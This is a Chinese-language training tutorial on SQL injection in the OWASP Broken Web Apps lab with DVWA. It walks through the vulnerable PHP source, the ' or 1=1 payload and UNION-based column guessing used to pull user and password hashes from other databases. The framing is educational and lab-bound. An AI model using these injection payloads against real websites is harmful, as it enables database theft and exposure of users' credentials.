4.sql注入攻击（OWASP实战训练）

引言

Sql注入是注入漏洞的榜首
注入漏洞危害极大，sql注入为其中一种是我们常见的。

  在owasp年度top10安全问题中，注入高居榜首，sql注入攻击是通过构建特殊的输入作为参数传入web应用程序，而这些输入大都是sql语法的一些组合，通过执行sql语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。
  1，对于web应用程序而言，用户核心数据存储在数据库中，例如MySQL、sqlserver、Oracle；
  2，通过sql注入攻击。可以获取、修改、删除数据库信息，并且通过提权来控制web服务器等其他操作；
  3，Sql注入即攻击者通过构造特殊的sql语句，入侵目标系统，致使后台数据库泄露数据的过程
  4，因为sql注入漏洞造成严重危害性，所以常年稳居owasp top10的榜首

  网站后台管理员账号也在数据库中，数据库重点攻击的方面，游戏拖库，等等。我们平常在京东或者双11检索产品时，买个笔记本，选一些条件（内存，品牌），其实我们点击按钮后就是一条sql语句，只是里面加了一些条件，包括下单也是sql语句（数据库的update操作）
  Sql语句不能随便改的，sql语句是写在后端的，前端源码是可以拿到的，后端不能拿到也不能改，前端的代码是可以改的，后端不能改。如前端限制只能输入30个字符，我们可以在发送请求时将其改掉。后端代码是看不到的，后端代码交给中间件处理，交给webserver由其作出响应。这边看到的只是前端的东西。
  我们在搜索框中搜索东西，其实执行的sql语句写死的，可能接受的品牌厂商，已经写好厂商华为或者联想。

1，实验环境owasp，kali Linux。

2，sql注入危害

1. 拖库导致用户数据泄露；（电话，身份证信息等）
2. 危害web等应用的安全（如网站）
3. 失去操作系统的控制权
4. 用户信息被非法买卖
5. 危害企业及国家安全

3，sql基础回顾

Sql语句必须了解，主要是select语句

（1）打开sql injection模块
（2）输入1提交

ID: 1
First name: admin
Surname: admin

（3）打开源代码查看

<?php     if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i = 0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i++; } 
} 
?>

  Sql注入是希望其查一些我们希望要的东西，表象看到的是改不了，而我们sql注入就是在其看起来不能改的情况下去改。改完以后是不能将其sql语句删除的，只能在输入的地方做一些特殊构造，来实现不可告人的目的。

 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 

比如想要查别的表，在这条语句怎么输也查不了，拖库也就没戏，我们想要的是将其整个数据库拿下。
在输入框中输入 ' or 1=1 -- dddddd 下方会出现

ID: ' or 1=1 -- dddddd
First name: admin
Surname: admin
ID: ' or 1=1 -- dddddd
First name: Gordon
Surname: Brown
ID: ' or 1=1 -- dddddd
First name: Hack
Surname: Me
ID: ' or 1=1 -- dddddd
First name: Pablo
Surname: Picasso
ID: ' or 1=1 -- dddddd
First name: Bob
Surname: Smith
ID: ' or 1=1 -- dddddd
First name: user
Surname: user

  按照原来的套路只能查询id为1的用户，而现在查询了所有的信息，这个是对方不愿给你的，但我们一步步做到了。
  Sql注入很有用也很强大，一旦你的数据库有注入点，那么所有的数据都会被抱走。
  刚才的行为就是构造了一个特殊的输入。

4，登录owasp

项目环境：owasp
表1：dvwa.user
表2：wordpress.wp_users
表3：mysql.user

root@owaspbwa:~# mysql -uroot -powaspbwa

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 582
Server version: 5.1.41-3ubuntu12.6-log (Ubuntu)Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
mysql> show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| .svn               |
| bricks             |
| bwapp              |
| citizens           |
| cryptomg           |
| dvwa               |
| gallery2           |
| getboo             |
| ghost              |
| gtd-php            |
| hex                |
| isp                |
| joomla             |
| mutillidae         |
| mysql              |
| nowasp             |
| orangehrm          |
| personalblog       |
| peruggia           |
| phpbb              |
| phpmyadmin         |
| proxy              |
| rentnet            |
| sqlol              |
| tikiwiki           |
| vicnum             |
| wackopicko         |
| wavsepdb           |
| webcal             |
| webgoat_coins      |
| wordpress          |
| wraithlogin        |
| yazd               |
+--------------------+
34 rows in set (0.55 sec)

mysql> select database();		//查看当前所在库

+------------+
| database() |
+------------+
| NULL       |
+------------+
1 row in set (0.00 sec)
mysql> select user();		//此函数返回当前用户
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql> select now();		//返回当前时间mysql> use dvwa;			进入库

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed

mysql> show tables;					查看有哪些表

+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.00 sec)
mysql> DESCRIBE users;				大写可以补全，查看特定表结构
+------------+-------------+------+-----+---------+-------+
| Field      | Type        | Null | Key | Default | Extra |
+------------+-------------+------+-----+---------+-------+
| user_id    | int(6)      | NO   | PRI | 0       |       |
| first_name | varchar(15) | YES  |     | NULL    |       |
| last_name  | varchar(15) | YES  |     | NULL    |       |
| user       | varchar(15) | YES  |     | NULL    |       |
| password   | varchar(32) | YES  |     | NULL    |       |
| avatar     | varchar(70) | YES  |     | NULL    |       |
+------------+-------------+------+-----+---------+-------+
6 rows in set (0.00 sec)
//这个看的是表的结构，查数据依托表结构才能查，如类型数字、字符。

mysql> show create table users\G     创建表  \G排序

DDL构造房屋框架
Bml对数据操作
DCL数据库控制语言，体现在授权、撤销权限
DQL数据库查询语言

mysql> select * from users;				从users表查询内容，可以\G让其格式有序

查字段是需要知道表的结构的

mysql> select user,password as avatar from users;		avatar是别名
mysql> select user,password  avatar from users;		用逗号隔开是字段，后面空着相当于上面的别名，加个逗号就是三个字段了如下
mysql> select user,password,avatar from users;	

我们的sql注入就是select语句别的是不需要的。

5，查询实例

（1）简单查询实例

当前库dvwa dvwa.users

mysql> select * from users;
mysql> select user_id,first_name,last_name from users;

其他库 mysql.user

mysql> desc mysql.user;
mysql> select * from mysql.user;
mysql> select user,password,host from mysql.user;

其他库 wordpress.user

mysql> desc wordpress.user;
mysql> select * from wordpress.user;
mysql> select user,password,host from wordpress.user;

（2）条件查询实例

mysql> select user,password,host from mysql.user where user=’root’;
mysql>select user,password,host from mysql.user where user=’root’and host = ’localhost’;
mysql> select user,password,host from mysql.user where user=’root’or host = ’localhost’;

mysql> desc dvwa.users;
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge';
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge' or 1=1;
mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'admin' and 1=2;

注意：若输入不正确在数据库中语句，可能是单引号是中文的原因

mysql> select user_id,first_name,last_name from dvwa.users where user_id=2;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7;
mysql> select user_id,first_name,last_name from dvwa.users where user_id=7 or 1=1;

（3）联合查询UNION

mysql> select user,password from mysql.user;
mysql> select user_login,user_pass from wordpress.wp_users;
mysql> select user,password from mysql.user union select user_login,user_pass from wordpress.wp_users;mysql> select user,password,host from mysql.user union select user_login,user_pass from wordpress.wp_users;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

注意：union查询前后字段数必须相同,如下

mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;

在mysql中不加引号表示字段

Select user,password,host from mysql.user where user=password;

//此句语法没错，但是password未加引号，把他当成了字段从两张表里寻找，加上引号表示字段的值

Select user,password,host from mysql.user where a.user=b.password;

//

Select user,password,host from mysql.user where user=’root’;

//选择user字段的值为root的从mysql数据库的user表中

Select user,password,host from mysql.user where user_id=1;

纯数字不能作为字段，一定是个值,加引号有可能将其作为字符串对待。

Sql注入有个大前提原来的语句动不了，只能自己加戏如

mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge';

这句话在数据库中是找不到的

mysql> select user_id,first_name,last_name from dvwa.users where first_name = 'yangge' or 1=1;

这句话是可以显示内容的，只是为了构造一个为真的条件，1=1是最简单的条件
我们在上一小节中讲到的在输入框中输入 ’ or 1=1 – dddddd
从源码可知

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 

上面的话变成了下面的

SELECT first_name, last_name FROM users WHERE user_id = '$id' or‘1=1’

之前是查询id号，则id就是where后的限制条件，我们将后面的条件变为真，就会将此表中的所有数据都显示出来
有些东西不能改变的就不要改变了，就改自己能改的

这是sql注入最初的样子

mysql> select user_id,first_name,last_name from dvwa.users where user_id=7 or 1=1;

假如我们让其条件为真了，是表的所有内容吗？不是，前面的字段是别人写死的，表也是别人写死的，最多最多能返回这个表中这些字段的所有值。并不是我们想要的所有东西，无论怎么玩都只是这些东西。但我们想要拖库。
这段命令不能查询别的表，这个条件只能查询这一张表，所以我们要是用union再联合一个查询语句。
我们要自加sql语句前面只能在其自己限定的表中查询，而后面可以再加一张表查询
Union并不复杂只是再加一条sql语句

mysql> select user,password,host from mysql.user union select user_login,user_pass from wordpress.wp_users;
ERROR

注意：union查询前后字段数必须相同,如下

mysql> select user,password,host from mysql.user union select user_login,user_pass,3 from wordpress.wp_users;

但是会出错，前面的字段数我们并不知道，也不能改，所以要试错，再加一个字段（数字即可，数字是可以充当字段的）
1，第一并不知道前面字段数
2，后面字段是什么也不知道
3，如果知道前面有5个字段的话，怎么去给后面字段补上5个，如何补齐字段，用数字凑

我们有个大神information_schema数据库字典
为什么sql注入学不会，需要一步一步来，我们要达到看懂的地步。

还有问题要声明一下，

mysql> select user,password,host from mysql.user union select user_login,user_pass,1 from wordpress.wp_users limit 5;

+------------------+-------------------------------------------+---------------+
| user             | password                                  | host          |
+------------------+-------------------------------------------+---------------+
| root             | *73316569DAC7839C2A784FF263F5C0ABBC7086E2 | localhost     |
| root             | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | brokenwebapps |
| root             | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | 127.0.0.1     |
| debian-sys-maint | *75F15FF5C9F06A7221FEB017724554294E40A327 | localhost     |
| phpmyadmin       | *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F | localhost     |
+------------------+-------------------------------------------+---------------+
5 rows in set (0.00 sec)

上面这条语句只是查看前5行的数据，有时数据太多可能成百上千行，我们要限制行数,还有显示的内容是以前面3个字段为主的，而我们想要的是后面字段的内容，可以将前面的内容否定掉如下

mysql> select user,password,host from mysql.user where 1=2 union select user_login,user_pass,1 from wordpress.wp_users limit 5;

+-------+----------------------------------+------+
| user  | password                         | host |
+-------+----------------------------------+------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 1    |
| user  | ee11cbb19052e40b07aac0ca060c23ee | 1    |
+-------+----------------------------------+------+
2 rows in set (0.00 sec)

前面的只是我们借着来查询后面的数据，不要在意字段名，而要关注内容值。

6，如何猜前面字段数

思考：前面的查询已经写死了，如何使下面的语句成功？

mysql> select * from dvwa.users;
> union
> mysql> select user_login,user_pass from wordpress.wp_user;

方法：猜字段数

mysql> select * from dvwa.users union select 1;
mysql> select * from dvwa.users union select 1,2;
mysql> select * from dvwa.users union select 1,2,3;
mysql> select * from dvwa.users union select 1,2,3,4;
mysql> select * from dvwa.users union select 1,2,3,4,5;
mysql> select * from dvwa.users union select 1,2,3,4,5,6;

mysql> select * from dvwa.users union select user_login,user_pass,1,2,3,4 from wordpress.wp_user;

如果对前面的不关注，就加上1=2不成立的条件，只显示后面的表。

总结：

1，使用或，布尔方式，另其1=1，只能查它限制的表，想到别的地方去做不到
2，使用union，自己再加一条select语句可以查别的，但也会受到权限的限制，人家开发人员已经定义好了，让哪个用户去连接哪个库。如果此用户只对某个库有权限，可以查这个库所有数据，若对所有库都有权限，都能查询。查询时，一般情况下，对当前查询的库有所有权限。

不要想着拿到一个账号可以拿到其他所有的库，一个mysql数据库可能有很多业务库但能不能都拿到不好说。

可能有的人觉得sql注入太麻烦，有手工注入，也有自动注入（程序帮自己尝试）